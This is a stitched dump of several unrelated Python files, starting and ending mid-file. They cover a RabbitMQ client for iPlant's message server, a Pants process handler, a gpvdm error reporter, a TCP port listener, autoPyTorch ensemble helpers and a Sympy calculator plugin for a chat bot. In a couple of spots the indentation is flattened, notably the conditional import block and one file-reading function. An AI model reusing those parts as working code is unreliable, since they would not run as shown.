        """
        if json_string and len(json_string) > 0:
            try:
                msg = json.loads(json_string)
            except (ValueError, TypeError):
                return False
            if isinstance(msg, dict) and ('client' in msg) and ('lease_start' in msg) and ('lease_expire' in msg):
                return True
        return False

    def __repr__(self):
        return "<bms_registration_result %s %d %d>" % (self.client, self.lease_start, self.lease_expire)
class bms_message_acceptor(object):
    """One message-acceptance rule: a field name plus a glob pattern."""

    def __init__(self, acceptor="path", pattern="*"):
        self.acceptor = acceptor
        self.pattern = pattern

    def asDict(self):
        """Return the rule as a plain dict, ready for JSON serialisation."""
        return self.__dict__

    def __repr__(self):
        return "<bms_message_acceptor %s %s>" % (self.acceptor, self.pattern)
class bms_client(object):
    """Client for the iPlant Border Message Server (BMS) over RabbitMQ.

    Runs a pika SelectConnection ioloop on a background thread, declares a
    per-application queue named "<user>/<appid>", consumes messages from it,
    and optionally keeps a registration lease alive by re-sending the
    registration message every BMS_REREGISTRATION_SEC seconds.
    """

    def __init__(self, host=None,
                 port=31333,
                 vhost="/",
                 user=None,
                 password=None,
                 appid=None,
                 auto_reregistration=True,
                 acceptors=None
                 ):
        self.host = host
        self.port = port
        self.vhost = vhost
        self.user = user
        self.password = password
        # Fall back to a random 8-character application id.
        if appid:
            self.appid = appid
        else:
            self.appid = self._generateAppid()
        self.connection = None
        self.channel = None
        self.queue = None
        self.closing = False
        self.consumer_tag = None
        self.consumer_thread = None
        self.registration_msg = None
        self.registration_timer = None
        self.auto_reregistration = auto_reregistration
        self.acceptors = acceptors
        self.on_connect_callback = None
        self.on_register_callback = None
        self.on_message_callback = None

    def setCallbacks(self, on_connect_callback=None, on_register_callback=None, on_message_callback=None):
        """Install any subset of the connect/register/message callbacks."""
        if on_connect_callback:
            self.on_connect_callback = on_connect_callback
        if on_register_callback:
            self.on_register_callback = on_register_callback
        if on_message_callback:
            self.on_message_callback = on_message_callback

    def clearCallbacks(self):
        """Remove all installed callbacks."""
        self.on_connect_callback = None
        self.on_register_callback = None
        self.on_message_callback = None

    def __enter__(self):
        self.connect()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.close()

    def _generateId(self, size=8, chars=string.ascii_uppercase + string.digits):
        # Random alphanumeric id of the requested size.
        return ''.join(random.choice(chars) for _ in range(size))

    def _generateAppid(self):
        return self._generateId()

    def _consumerThreadTask(self):
        # Runs the pika ioloop; blocks until the connection is closed.
        self.connection.ioloop.start()

    def connect(self):
        """Open the AMQP connection and start the ioloop on a worker thread."""
        credentials = pika.PlainCredentials(self.user,
                                            self.password)
        parameters = pika.ConnectionParameters(self.host,
                                               self.port,
                                               self.vhost,
                                               credentials)
        # NOTE(review): stop_ioloop_on_close was removed in pika 1.x; this
        # code assumes the pika 0.x API — confirm the pinned pika version.
        self.connection = pika.SelectConnection(parameters,
                                                self._onConnectionOpen,
                                                stop_ioloop_on_close=False)
        self.consumer_thread = threading.Thread(target=self._consumerThreadTask)
        self.consumer_thread.start()

    def _onConnectionOpen(self, connection):
        self.connection.add_on_close_callback(self._onConnectionClosed)
        # open a channel
        self.connection.channel(on_open_callback=self._onChannelOpen)

    def _onConnectionClosed(self, connection, reply_code, reply_text):
        self.channel = None
        if self.closing:
            self.connection.ioloop.stop()
        else:
            # Unexpected drop: try to reconnect after 5 seconds.
            self.connection.add_timeout(5, self.reconnect)

    def _onChannelOpen(self, channel):
        self.channel = channel
        self.channel.add_on_close_callback(self._onChannelClosed)
        # declare a queue; one queue per user/application pair
        self.queue = self.user + "/" + self.appid
        self.channel.queue_declare(self._onQueueDeclareok,
                                   queue=self.queue,
                                   durable=False,
                                   exclusive=False,
                                   auto_delete=True)

    def _onQueueDeclareok(self, mothod_frame):
        # (param name "mothod_frame" kept as-is for interface compatibility)
        # set consumer
        self.channel.add_on_cancel_callback(self._onConsumerCancelled)
        self.consumer_tag = self.channel.basic_consume(self._onMessage,
                                                       queue=self.queue,
                                                       no_ack=False)
        # call callback
        if self.on_connect_callback:
            self.on_connect_callback()
        # register automatically
        if self.auto_reregistration:
            if self.acceptors:
                self.register(self.acceptors)

    def _onChannelClosed(self, channel, reply_code, reply_text):
        # Stop the lease-renewal timer before tearing the connection down.
        if self.registration_timer:
            self.registration_timer.cancel()
            self.registration_timer = None
        self.connection.close()

    def _onConsumerCancelled(self, method_frame):
        if self.channel:
            self.channel.close()

    def _onMessage(self, channel, method, properties, body):
        # acknowledge
        self.channel.basic_ack(method.delivery_tag)
        # Dispatch: registration responses go to on_register_callback,
        # everything else to on_message_callback.
        if bms_registration_result.isRegistrationJson(body):
            if self.on_register_callback:
                self.on_register_callback(bms_registration_result.fromJson(body))
        else:
            if self.on_message_callback:
                self.on_message_callback(body)

    def reconnect(self):
        """Stop the old ioloop and establish a fresh connection."""
        self.connection.ioloop.stop()
        if not self.closing:
            # BUG FIX: connect() assigns self.connection itself and returns
            # None; the previous `self.connection = self.connect()` clobbered
            # the freshly created connection with None.
            self.connect()

    def close(self):
        """Cancel the consumer, close the connection and stop the ioloop."""
        self.closing = True
        if self.channel:
            self.channel.basic_cancel(self._onCancelok, self.consumer_tag)
        # Run the ioloop once more so the cancel/close callbacks can fire.
        self.connection.ioloop.start()
        self.connection.close()
        self.consumer_thread = None

    def _onCancelok(self, unused_frame):
        self.channel.close()

    def reRegister(self):
        """Re-send the last registration message to renew the lease."""
        if self.channel:
            if self.registration_msg:
                self._registerByString(self.registration_msg)

    def _registerByString(self, msg):
        self.registration_msg = msg
        # set a message property so responses come back to our queue
        prop = pika.BasicProperties(reply_to=self.queue)
        # request a registration
        self.channel.basic_publish(exchange=BMS_REGISTRATION_EXCHANGE,
                                   routing_key=BMS_REGISTRATION_QUEUE,
                                   properties=prop,
                                   body=msg)
        if self.registration_timer:
            self.registration_timer.cancel()
        # Schedule the next lease renewal.
        if self.auto_reregistration:
            self.registration_timer = threading.Timer(BMS_REREGISTRATION_SEC, self.reRegister)
            self.registration_timer.start()

    def register(self, acceptors):
        """Request a lease covering the given bms_message_acceptor rules."""
        # make a registration message, e.g.:
        """
        reg_msg = {"request": "lease",
                   "client": {"user_id": self.user,
                              "application_name": self.appid},
                   "acceptors": [{"acceptor": "path",
                                  "pattern": "/iplant/home/iychoi/*"}] }
        """
        acceptor_arr = []
        for acceptor in acceptors:
            acceptor_arr.append(acceptor.asDict())
        reg_msg = {"request": "lease",
                   "client": {"user_id": self.user,
                              "application_name": self.appid},
                   "acceptors": acceptor_arr}
        reg_msg_str = json.dumps(reg_msg)
        self._registerByString(reg_msg_str)
|
process_handler.py | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import multiprocessing
import os
import StringIO
import sys
from abc import abstractmethod
import six
from pants.util.meta import AbstractClass
# Expose subprocess with python 3.2+ capabilities (namely timeouts) and bugfixes from this module.
# NB: As recommended here: https://github.com/google/python-subprocess32/blob/master/README.md
# which accounts for non-posix, ie: Windows. Although we don't support Windows yet, this sets the
# pattern up in anticipation.
if os.name == 'posix' and six.PY2:
import subprocess32 as subprocess3
else:
import subprocess as subprocess3
subprocess = subprocess3
class ProcessHandler(AbstractClass):
    """An abstraction of process handling calls using the same interface as subprocess(32).Popen.
    See SubprocessProcessHandler below for an example.
    """
    @abstractmethod
    def wait(self, timeout=None):
        """Wait for the underlying process to terminate.
        :param float timeout: The time to wait for the process to terminate in fractional seconds. Wait
        forever by default.
        :returns: The process exit code if it has terminated.
        :rtype: int
        :raises: :class:`subprocess.TimeoutExpired`
        """
    @abstractmethod
    def kill(self):
        """Forcibly kill the underlying process."""
        pass
    @abstractmethod
    def terminate(self):
        """Ask the underlying process to terminate."""
        pass
    @abstractmethod
    def poll(self):
        """Return the exit code if the process has terminated, else None."""
        pass
class SubprocessProcessHandler(ProcessHandler):
    """A `ProcessHandler` that delegates directly to a subprocess(32).Popen object."""
    def __init__(self, process):
        # process: a subprocess(32).Popen instance to delegate to.
        self._process = process
    def wait(self, timeout=None):
        return self._process.wait(timeout=timeout)
    def kill(self):
        return self._process.kill()
    def terminate(self):
        return self._process.terminate()
    def poll(self):
        return self._process.poll()
    def communicate_teeing_stdout_and_stderr(self, stdin=None):
        """
        Just like subprocess.communicate, but tees stdout and stderr to both sys.std{out,err} and a
        buffer. Only operates on stdout/stderr if the Popen call send them to subprocess.PIPE.
        :param stdin: A string to send to the stdin of the subprocess.
        :return: (stdout, stderr) as strings.
        """
        # NOTE(review): stdin is written but never closed here, so a child
        # that reads until EOF may block — confirm callers' expectations.
        if stdin is not None and self._process.stdin is not None:
            self._process.stdin.write(stdin)
        def fork_tee(infile, outfile):
            # Spawn a child process that copies infile to outfile (via _tee)
            # and returns a thunk that joins the child and yields its output.
            if infile is None:
                return lambda: None
            queue = multiprocessing.Queue()
            process = multiprocessing.Process(target=_tee, args=(infile, outfile, queue.put))
            process.start()
            def join_and_get_output():
                process.join()
                return queue.get()
            return join_and_get_output
        stdout = fork_tee(self._process.stdout, sys.stdout)
        stderr = fork_tee(self._process.stderr, sys.stderr)
        # Wait for the child first, then collect the teed output.
        self._process.wait()
        return stdout(), stderr()
def _tee(infile, outfile, return_function):
    """Copy each line from `infile` to `outfile`, then pass the accumulated
    text to `return_function` and close `infile`."""
    collected = []
    for line in iter(infile.readline, ""):
        collected.append(line)
        outfile.write(line)
    infile.close()
    return_function("".join(collected))
|
report_error.py | #
# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall
# model for 1st, 2nd and 3rd generation solar cells.
# Copyright (C) 2008-2022 Roderick C. I. MacKenzie r.c.i.mackenzie at googlemail.com
#
# https://www.gpvdm.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2.0, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## @package report_error
# Report an error using a thread.
#
import os
from win_lin import running_on_linux
from threading import Thread
import platform
from gpvdm_http import get_data_from_web
import hashlib
from sim_warnings import sim_warnings
import i18n
_ = i18n.language.gettext
from const_ver import const_ver
#qt
from PyQt5.QtCore import QSize, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QWidget
from PyQt5.QtGui import QPixmap
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QWidget
from urllib.parse import quote
from PyQt5.QtCore import QTimer
from lock import get_lock
class report_error(QWidget):
    """Transmits a bug/error report from a background thread.

    Emits `reported(True)` once the report has been sent.
    """
    # Signal fired after the report has been transmitted.
    reported = pyqtSignal(bool)
    def __init__(self):
        QWidget.__init__(self)
        # Error text to transmit; set via set_error() before calling start().
        self.error=""
    def tx_error(self,n):
        # Runs on the worker thread; `n` is unused.
        get_lock().report_bug(self.error)
        self.reported.emit(True)
    def set_error(self,error):
        self.error=error
    def start(self):
        # Daemon thread so a pending report never blocks application exit.
        p = Thread(target=self.tx_error, args=(10,))
        p.daemon = True
        p.start()
|
port_listener.py | #!/usr/bin/python3
"""
Point of this script is to spawn TCP servers based on
configuration provided in proper file in etc.
"""
import socketserver
import json
import threading
import argparse
# Address to bind all listeners to (all interfaces).
IP = "0.0.0.0"
# Port -> response-words mapping, loaded from the JSON config at startup.
CONFIG = {}
def start_listener(listener_data):
    """
    Wrapper function to start TCP server.
    Args:
        listener_data (tuple): (host, port) address pair for the TCP server
    """
    server = socketserver.TCPServer(listener_data, MyTCPHandler)
    # NOTE(review): `timeout` only affects handle_request(); serve_forever()
    # ignores it, so this setting presumably has no effect here — confirm.
    server.timeout = 3
    # Blocks this thread until shutdown.
    server.serve_forever()
class MyTCPHandler(socketserver.BaseRequestHandler):
    """
    Handler that serves the configured response to the requesting client.
    """
    def handle(self):
        """
        Look up the response in the CONFIG dict keyed by the local port
        this connection arrived on, and send it to the client.
        """
        # Fixed typo in the log message ("Incomiong" -> "Incoming").
        print("Incoming connection on port {}".format(
            str(self.server.server_address[1])))
        # CONFIG maps the port (as a string) to a sequence of words that are
        # joined into the response payload.
        self.request.sendall(
            bytes(" ".join(
                CONFIG[str(self.server.server_address[1])]), "utf-8"))
if __name__ == "__main__":
    PARSER = argparse.ArgumentParser()
    PARSER.add_argument('-c', '--config',
                        help="Config file for service",
                        default="/etc/port-listener.json", type=str)
    ARGS = PARSER.parse_args()
    CONFIG_PATH = ARGS.config
    # Load the port -> response mapping; keys are port numbers as strings.
    with open(CONFIG_PATH, 'r') as infile:
        CONFIG = json.loads(infile.read())
    SERVICES = [(IP, int(i)) for i in CONFIG.keys()]
    THREADS = []
    # One daemon listener thread per configured port.
    for service in SERVICES:
        print("Binding to port {}".format(service[1]))
        t = threading.Thread(target=start_listener, args=[service])
        t.daemon = True
        t.start()
        THREADS.append(t)
    # Block on the first listener forever; daemon threads die with the process.
    # NOTE(review): raises IndexError when the config is empty — confirm
    # that is acceptable.
    THREADS[0].join()
|
ensemble.py | import os
import time
import numpy as np
import json
import math
import tempfile
import uuid
import asyncio
import multiprocessing
import signal
import logging
from autoPyTorch.components.ensembles.ensemble_selection import EnsembleSelection
def build_ensemble(result, optimize_metric,
                   ensemble_size, all_predictions, labels, model_identifiers,
                   only_consider_n_best=0, sorted_initialization_n_best=0):
    """Fit an ensemble over the stored predictions.

    Returns (ensemble_selection, ensemble_configs) where ensemble_configs
    maps each selected model's (job) identifier prefix to its configuration.
    """
    id2config = result.get_id2config_mapping()
    selection = EnsembleSelection(ensemble_size, optimize_metric,
                                  only_consider_n_best=only_consider_n_best,
                                  sorted_initialization_n_best=sorted_initialization_n_best)
    # fit ensemble
    selection.fit(np.array(all_predictions), labels, model_identifiers)
    configs = {
        tuple(identifier[:3]): id2config[tuple(identifier[:3])]["config"]
        for identifier in selection.get_selected_model_identifiers()
    }
    return selection, configs
def read_ensemble_prediction_file(filename, y_transform):
all_predictions = list()
all_timestamps = list()
labels = None
model_identifiers = list()
with open(filename, "rb") as f:
labels = np.load(f)
labels, _ = y_transform(labels)
while True:
try:
job_id, budget, timestamps = np.load(f)
predictions = np.load(f)
model_identifiers.append(job_id + (budget, ))
predictions = np.array(predictions)
all_predictions.append(predictions)
all_timestamps.append(timestamps)
except (EOFError, OSError):
break
return all_predictions, labels, model_identifiers, all_timestamps
class test_predictions_for_ensemble():
    """Callable that produces test-set predictions for the ensemble logger."""
    def __init__(self, autonet, X_test, Y_test):
        self.autonet = autonet
        self.X_test = X_test
        self.Y_test = Y_test
        # Bind the unbound predict function; it is later called with
        # `autonet` passed explicitly.
        from autoPyTorch.core.api import AutoNet
        self.predict = AutoNet.predict
    def __call__(self, model, epochs):
        # NaN acts as a "no test data" sentinel; downstream code filters
        # these entries out via the d == d test (NaN != NaN).
        if self.Y_test is None or self.X_test is None:
            return float("nan")
        # Returns (probability predictions, ground-truth test labels).
        return self.predict(self.autonet, self.X_test, return_probabilities=True)[1], self.Y_test
def combine_predictions(data, pipeline_kwargs, X, Y):
    """Merge per-split validation predictions into index order and stage them.

    Writes the sorted predictions and the matching labels into uniquely
    named files in the temp dir (picked up by the ensemble server) and
    returns (host, port, unique); returns None when any split contains NaNs.
    """
    all_indices = None
    all_predictions = None
    for split, predictions in data.items():
        if (np.any(np.isnan(predictions))):
            # Logger.warn is a deprecated alias of Logger.warning.
            logging.getLogger("autonet").warning("Not saving predictions containing nans")
            return None
        indices = pipeline_kwargs[split]["valid_indices"]
        assert len(predictions) == len(indices), "Different number of predictions and indices:" + str(len(predictions)) + "!=" + str(len(indices))
        all_indices = indices if all_indices is None else np.append(all_indices, indices)
        all_predictions = predictions if all_predictions is None else np.vstack((all_predictions, predictions))
    # Restore the original sample order across splits.
    argsort = np.argsort(all_indices)
    sorted_predictions = all_predictions[argsort]
    sorted_indices = all_indices[argsort]
    # Stage the arrays under a unique id; the ensemble server serves and
    # then deletes these files. (A stray no-op tempfile.gettempdir() call
    # was removed here.)
    unique = uuid.uuid4()
    with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_predictions_%s.npy" % unique), "wb") as f:
        np.save(f, sorted_predictions)
    with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique), "wb") as f:
        np.save(f, Y[sorted_indices])
    host, port = pipeline_kwargs[0]["pipeline_config"]["ensemble_server_credentials"]
    return host, port, unique
def combine_test_predictions(data, pipeline_kwargs, X, Y):
    """Stack per-split test predictions and stage them for the ensemble server.

    NaN placeholders (for which d == d is False) are skipped. Returns
    (host, port, unique) identifying the staged files, or None when no
    predictions are available.
    """
    # d == d filters out float('nan') sentinels produced when no test data
    # was available (see test_predictions_for_ensemble.__call__).
    predictions = [d[0] for d in data.values() if d == d]
    labels = [d[1] for d in data.values() if d == d]
    # Every split must have seen identical test labels.
    assert all(np.all(labels[0] == l) for l in labels[1:])
    assert len(predictions) == len(labels)
    if len(predictions) == 0:
        return None
    # Stage the arrays under a unique id; the ensemble server serves and
    # then deletes these files. (A stray no-op tempfile.gettempdir() call
    # was removed here.)
    unique = uuid.uuid4()
    with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_predictions_%s.npy" % unique), "wb") as f:
        np.save(f, np.stack(predictions))
    with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique), "wb") as f:
        np.save(f, labels[0])
    host, port = pipeline_kwargs[0]["pipeline_config"]["ensemble_server_credentials"]
    return host, port, unique
def filter_nan_predictions(predictions, *args):
    """Drop entries whose prediction contains NaNs.

    The same positions are removed from every extra vector in *args
    (vectors that are None are passed through unchanged). Returns a list:
    [filtered_predictions, filtered_arg0, ...].
    """
    bad = {idx for idx, pred in enumerate(predictions) if np.any(np.isnan(pred))}
    filtered = []
    for vector in (predictions,) + args:
        if vector is None:
            filtered.append(None)
        else:
            filtered.append([item for idx, item in enumerate(vector) if idx not in bad])
    return filtered
async def serve_predictions(reader, writer):
    """Serve one staged prediction/label file to a client, then delete it.

    Protocol: the client sends "<name>_<unique>"; the server streams
    autonet_ensemble_<name>_<unique>.npy from the temp dir and removes it.
    """
    data = await reader.read(1024)
    name, unique = data.decode().split("_")
    # logging.getLogger("autonet").info("Serve %s %s" % (name, unique))
    with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_%s_%s.npy" % (name, unique)), "rb") as f:
        # Stream the file in 1 KiB chunks.
        while True:
            buf = f.read(1024)
            if not buf:
                break
            writer.write(buf)
    # Staged files are one-shot: delete after serving.
    os.remove(os.path.join(tempfile.gettempdir(), "autonet_ensemble_%s_%s.npy" % (name, unique)))
    # Once the predictions were fetched, a still-present labels file for the
    # same unique id is no longer needed either.
    if name == "predictions" and os.path.exists(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique)):
        os.remove(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique))
    await writer.drain()
    writer.close()
def _start_server(host, queue):
    """Run the asyncio prediction server in this (child) process.

    Publishes the actually bound (host, port) through `queue`, then serves
    until SIGTERM — translated into KeyboardInterrupt — shuts the loop down.
    """
    def shutdown(signum, stack):
        # Turn SIGTERM into KeyboardInterrupt so the cleanup path below runs.
        raise KeyboardInterrupt
    signal.signal(signal.SIGTERM, shutdown)
    loop = asyncio.get_event_loop()
    # Port 0: let the OS pick a free port.
    # NOTE(review): the `loop=` argument was removed in Python 3.10 — this
    # assumes an older asyncio API; confirm the supported Python range.
    coro = asyncio.start_server(serve_predictions, host, 0, loop=loop)
    server = loop.run_until_complete(coro)
    host, port = server.sockets[0].getsockname()
    queue.put((host, port))
    try:
        loop.run_forever()
    except KeyboardInterrupt:
        pass
    server.close()
    loop.run_until_complete(server.wait_closed())
    loop.close()
    # logging.getLogger("autonet").info("Ensemble Server has been shut down")
def start_server(host):
    """Start the ensemble prediction server in a separate process.

    Returns (host, port, process); the process exposes shutdown() as an
    alias for terminate().
    """
    queue = multiprocessing.Queue()
    p = multiprocessing.Process(target=_start_server, args=(host, queue))
    p.start()
    # Block until the child reports the address it actually bound to.
    host, port = queue.get()
    # Alias terminate() under the shutdown() name.
    p.shutdown = p.terminate
    return host, port, p
class ensemble_logger(object):
    """Job callback that appends validation/test predictions to .npy files.

    For each finished job it pulls the staged prediction arrays from the
    ensemble server (see serve_predictions) and appends them, preceded by a
    (job id, budget, timestamps) header record, to
    predictions_for_ensemble.npy and test_predictions_for_ensemble.npy
    inside `directory`.
    """
    def __init__(self, directory, overwrite):
        self.start_time = time.time()
        self.directory = directory
        self.overwrite = overwrite
        # The labels record is written only once, before the first predictions.
        self.labels_written = False
        self.test_labels_written = False
        self.file_name = os.path.join(directory, 'predictions_for_ensemble.npy')
        self.test_file_name = os.path.join(directory, 'test_predictions_for_ensemble.npy')
        # Create (or, with overwrite, truncate) both output files up front;
        # mode 'x' raises FileExistsError when the file is already there.
        try:
            with open(self.file_name, 'x') as fh: pass
        except FileExistsError:
            if overwrite:
                with open(self.file_name, 'w') as fh: pass
            else:
                raise FileExistsError('The file %s already exists.'%self.file_name)
        except:
            # NOTE(review): this bare re-raise is a no-op and could be removed.
            raise
        try:
            with open(self.test_file_name, 'x') as fh: pass
        except FileExistsError:
            if overwrite:
                with open(self.test_file_name, 'w') as fh: pass
            else:
                raise FileExistsError('The file %s already exists.'%self.test_file_name)
        except:
            raise
    def new_config(self, *args, **kwargs):
        # Part of the logger interface; nothing to do for new configurations.
        pass
    async def save_remote_data(self, host, port, name, unique, f):
        """Stream the staged array "<name>_<unique>" from the server into f."""
        remote_reader, remote_writer = await asyncio.open_connection(host, port)
        remote_writer.write(("%s_%s" % (name, unique)).encode())
        while not remote_reader.at_eof():
            f.write(await remote_reader.read(1024))
        remote_writer.close()
    def __call__(self, job):
        """Append this job's staged predictions (if any) to the output files."""
        if job.result is None:
            return
        # Each call gets a fresh event loop; this may run off the main thread.
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        # NOTE(review): when only test predictions exist, the staged
        # validation "predictions" file is drained into /dev/null — which
        # makes the server delete the staged files. Presumably intentional
        # cleanup; confirm the interaction with the branch below. Also note
        # "/dev/null" is POSIX-only.
        if "predictions_for_ensemble" in job.result and job.result["predictions_for_ensemble"] is None and \
                "test_predictions_for_ensemble" in job.result and job.result["test_predictions_for_ensemble"] is not None:
            host, port, unique = job.result["test_predictions_for_ensemble"]
            with open("/dev/null", "wb") as f:
                loop.run_until_complete(self.save_remote_data(host, port, "predictions", unique, f))
        if "predictions_for_ensemble" in job.result and job.result["predictions_for_ensemble"] is not None:
            host, port, unique = job.result["predictions_for_ensemble"]
            with open(self.file_name, "ab") as f:
                # Labels first (once), then the metadata header, then the
                # prediction array fetched from the server.
                if not self.labels_written:
                    loop.run_until_complete(self.save_remote_data(host, port, "labels", unique, f))
                    self.labels_written = True
                np.save(f, np.array([job.id, job.kwargs['budget'], job.timestamps], dtype=object))
                loop.run_until_complete(self.save_remote_data(host, port, "predictions", unique, f))
            del job.result["predictions_for_ensemble"]
        if "test_predictions_for_ensemble" in job.result and job.result["test_predictions_for_ensemble"] is not None:
            host, port, unique = job.result["test_predictions_for_ensemble"]
            with open(self.test_file_name, "ab") as f:
                if not self.test_labels_written:
                    loop.run_until_complete(self.save_remote_data(host, port, "labels", unique, f))
                    self.test_labels_written = True
                np.save(f, np.array([job.id, job.kwargs['budget'], job.timestamps], dtype=object))
                loop.run_until_complete(self.save_remote_data(host, port, "predictions", unique, f))
            del job.result["test_predictions_for_ensemble"]
        loop.close()
arithmetic.py | #!/usr/bin/env python3
import re, random
import token
import multiprocessing
import sympy
from sympy.core import numbers
from sympy.parsing.sympy_parser import parse_expr, standard_transformations, implicit_multiplication, implicit_application
from sympy.parsing.sympy_tokenize import TokenError
from sympy.physics import units
from .utilities import BasePlugin
# Token types that may appear in a user-supplied expression.
ALLOWED_TOKENS = {
    token.ENDMARKER, token.NAME, token.NUMBER, token.STRING, token.LPAR,
    token.RPAR, token.LSQB, token.RSQB, token.COMMA, token.PLUS,
    token.MINUS, token.STAR, token.SLASH, token.VBAR, token.AMPER,
    token.LESS, token.GREATER, token.PERCENT, token.LBRACE, token.RBRACE,
    token.EQEQUAL, token.NOTEQUAL, token.LESSEQUAL, token.GREATEREQUAL, token.TILDE,
    token.CIRCUMFLEX, token.LEFTSHIFT, token.RIGHTSHIFT, token.DOUBLESTAR, token.DOUBLESLASH,
    token.AT,
}
# Operator spellings accepted for generic token.OP tokens.
ALLOWED_OPS = {"(", ")", "[", "]", ",", "+", "-", "*", "/", "|", "&", "<", ">", "%", "{", "}", "==", "!=", "<=", ">=", "~", "^", "<<", ">>", "**", "//", "@"}
# Names users may reference: a whitelisted subset of sympy's namespace...
ALLOWED_NAMESPACE = {
    name: getattr(sympy, name) for name in
    {"Abs", "E", "Eq", "Float", "I", "Integer", "Symbol", "acos", "acosh", "acot", "acoth", "acsc", "asec", "asech", "asin", "asinh", "atan", "atan2", "atanh", "ceiling", "comp", "compose", "conjugate", "cos", "cosh", "cot", "coth", "csc", "csch", "decompose", "deg", "degree", "denom", "diff", "div", "divisors", "exp", "expand", "factor", "factorial", "false", "floor", "gamma", "gcd", "im", "integrate", "invert", "is_decreasing", "is_increasing", "is_monotonic", "is_strictly_decreasing", "is_strictly_increasing", "isolate", "isprime", "latex", "lcm", "li", "limit", "limit_seq", "ln", "log", "nan", "nroots", "nsimplify", "nsolve", "numer", "oo", "pi", "primefactors", "prod", "product", "quo", "rad", "re", "real_roots", "refine", "refine_root", "rem", "roots", "satisfiable", "sec", "sech", "sign", "simplify", "sin", "sinc", "sinh", "solve", "sqrt", "subsets", "summation", "tan", "tanh", "to_cnf", "to_dnf", "to_nnf", "true"}
}
# ...plus every dimension, prefix and quantity from sympy.physics.units.
ALLOWED_NAMESPACE.update({
    name: getattr(units, name) for name in dir(units)
    if type(getattr(units, name)) in [units.dimensions.Dimension, units.prefixes.Prefix, units.quantities.Quantity]
})
def whitelist_tokens(tokens, local_dict, global_dict):
    """Sympy parser transformation that rejects non-whitelisted tokens.

    Raises TokenError on the first token outside ALLOWED_TOKENS (or, for
    generic OP tokens, outside ALLOWED_OPS); otherwise returns the token
    stream unchanged.
    """
    for tok_type, tok_value in tokens:
        permitted = (tok_type in ALLOWED_TOKENS
                     or (tok_type == token.OP and tok_value in ALLOWED_OPS))
        if not permitted:
            raise TokenError("forbidden token {}".format(tok_type))
    return tokens
def evaluate_with_time_limit(text, time_limit=1):
    """Parse and simplify `text` with sympy, giving up after `time_limit` seconds.

    Returns the simplified sympy expression on success, the raised Exception
    on parse/evaluation errors, or None on timeout.
    """
    def evaluate(queue, text):
        # NOTE(review): `subs` is built but never used below — dead code?
        subs = {
            sympy.Symbol(k): v for k, v in units.__dict__.items()
            if (isinstance(v, sympy.Expr) and v.has(units.Unit)) or isinstance(v, sympy.Integer)
        }
        try:
            # whitelist_tokens runs first so forbidden tokens abort parsing.
            transformations = (whitelist_tokens,) + standard_transformations + (implicit_multiplication, implicit_application)
            expression = parse_expr(text, local_dict=ALLOWED_NAMESPACE, global_dict={}, transformations=transformations)
            simplified_expression = sympy.simplify(expression)
            queue.put(simplified_expression)
        except Exception as e:
            # Errors are communicated back as values, not raised.
            queue.put(e)
    # run the evaluator in a separate process in order to enforce time limits
    queue = multiprocessing.SimpleQueue()
    process = multiprocessing.Process(target=evaluate, args=(queue, text))
    process.start()
    process.join(time_limit)
    if process.is_alive() or queue.empty():
        # Timed out (or died without a result): kill the child, signal None.
        process.terminate()
        return None
    return queue.get()
class ArithmeticPlugin(BasePlugin):
    """
    Symbolic mathematics plugin for Botty.
    This uses Sympy for computation and implements evaluation timeouts by spawning a child process and killing it if it takes too much time.
    Example invocations:
        #general | Me: ca sqrt(20)
        #general | Botty: sqrt(20) :point_right: 2*sqrt(5) :point_right: 4.4721359549995793928183473374625524708812367192230514485417944908210418512756098
        #general | Me: calculate integrate(1/x, x)
        #general | Botty: integrate(1/x, x) :point_right: log(x)
        #general | Me: calculate 1kg meter/second**2 + 2 newtons
        #general | Botty: 1kg meter/second**2 + 2 newtons :point_right: 3*kg*m/s**2
        #general | Me: eval solve(Eq(x**2, 6), x)
        #general | Botty: solve(Eq(x**2, 6), x) :point_right: [-sqrt(6), sqrt(6)]
    """
    def __init__(self, bot):
        super().__init__(bot)
    def on_message(self, m):
        # Only react to plain user text messages.
        if not m.is_user_text_message: return False
        # Trigger words: ca / calc / calculate / eval / evaluate, then the query.
        match = re.search(r"^\s*\b(?:ca(?:lc(?:ulate)?)?|eval(?:uate)?)\s+(.+)", m.text, re.IGNORECASE)
        if not match: return False
        query = self.sendable_text_to_text(match.group(1)) # get query as plain text in order to make things like < and > work (these are usually escaped)
        expression = evaluate_with_time_limit(query)
        if isinstance(expression, Exception): # evaluation resulted in error
            # Reply with a random quip plus the underlying error.
            message = random.choice(["s a d e x p r e s s i o n s", "wat", "results hazy, try again later", "cloudy with a chance of thunderstorms", "oh yeah, I learned all about that in my sociology class", "eh too lazy, get someone else to do it", "would you prefer the truth or a lie?", "nice try", "you call that an expression?"])
            self.respond_raw("{} ({})".format(message, expression), as_thread=True)
        elif expression is None: # evaluation timed out
            self.respond_raw("tl;dr", as_thread=True)
        else: # evaluation completed successfully
            # For non-numeric results, also show an 80-digit numeric value.
            if hasattr(expression, "evalf") and not isinstance(expression, numbers.Integer) and not isinstance(expression, numbers.Float):
                value = expression.evalf(80)
                if value == sympy.zoo: formatted_value = "(complex infinity)"
                elif value == sympy.oo: formatted_value = "\u221e"
                else: formatted_value = str(value)
